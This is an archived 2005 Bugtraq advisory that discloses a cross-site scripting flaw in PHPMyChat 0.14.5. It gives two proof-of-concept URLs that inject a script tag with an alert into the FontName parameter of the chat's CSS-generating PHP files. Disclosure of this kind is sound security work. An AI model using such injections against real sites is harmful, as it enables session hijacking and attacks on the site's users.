[38861] in bugtraq

home help back first fref pref prev next nref lref last post

PHPHeaven PHPMyChat Cross-site Scripting Vulnerablitiy

daemon@ATHENA.MIT.EDU (Megasky)
Fri May 13 17:49:03 2005

Date: 14 May 2005 04:21:07 -0000
Message-ID: <20050514042107.15857.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Megasky <magasky@hotmail.com>
To: bugtraq@securityfocus.com



www.phpheaven.net/

Vulnerable versions: PHPMyChat 0.14.5

Proof of concept: 
http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt;


http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt;


home help back first fref pref prev next nref lref last post